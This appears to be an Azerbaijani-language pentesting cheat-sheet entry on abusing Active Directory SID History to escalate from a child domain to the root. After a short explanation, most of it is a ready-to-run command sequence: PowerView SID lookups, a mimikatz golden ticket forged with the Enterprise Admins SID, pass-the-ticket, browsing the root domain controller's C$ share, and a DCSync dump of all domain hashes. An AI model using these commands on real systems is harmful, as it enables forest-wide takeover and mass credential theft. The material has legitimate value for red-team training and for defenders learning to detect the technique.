SID History istifadəçinin bir domendən digərinə köçürüləcəyi miqrasiya ssenarilərini dəstəkləmək üçün nəzərdə tutulmuşdur. "Köhnə" domendəki resurslara girişi qorumaq üçün istifadəçinin əvvəlki SID yeni hesabının SID History-nə əlavə olunacaq. Beləliklə, belə bir yaratarkən, əsas domendə imtiyazlı qrupun (EA, DA və s.) SID-i əlavə edilə bilər ki, bu da bütün resurslara giriş imkanı verəcəkdir.
İstifadəsi
#PowerView istifadə edərək Cari Domenin SID-ni əldə edin
Get-DomainSID -Domain current.root.domain.local
#PowerView istifadə edərək root Domenin SID-ni əldə edin
Get-DomainSID -Domain root.domain.local
#Enteprise Adminlərin SID yaradın
Format: RootDomainSID-519
#mimikatz-dan istifadə edərək golden ticket yaradın
kerberos::golden /user:Administrator /domain:current.root.domain.local /sid:<CurrentDomainSID> /krbtgt:<krbtgtHash> /sids:<EnterpriseAdminsSID> /startoffset:0 /endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi
#ticket yaddaşa daxil edin
kerberos::ptt \path\to\ticket\golden.kirbi
#Root Domainin DC sadalayır
dir \\dc.root.domain.local\C$
#Və ya DCsync və mimikatz-dan istifadə edərək hashləri əldə edin
lsadump::dcsync /domain:root.domain.local /all
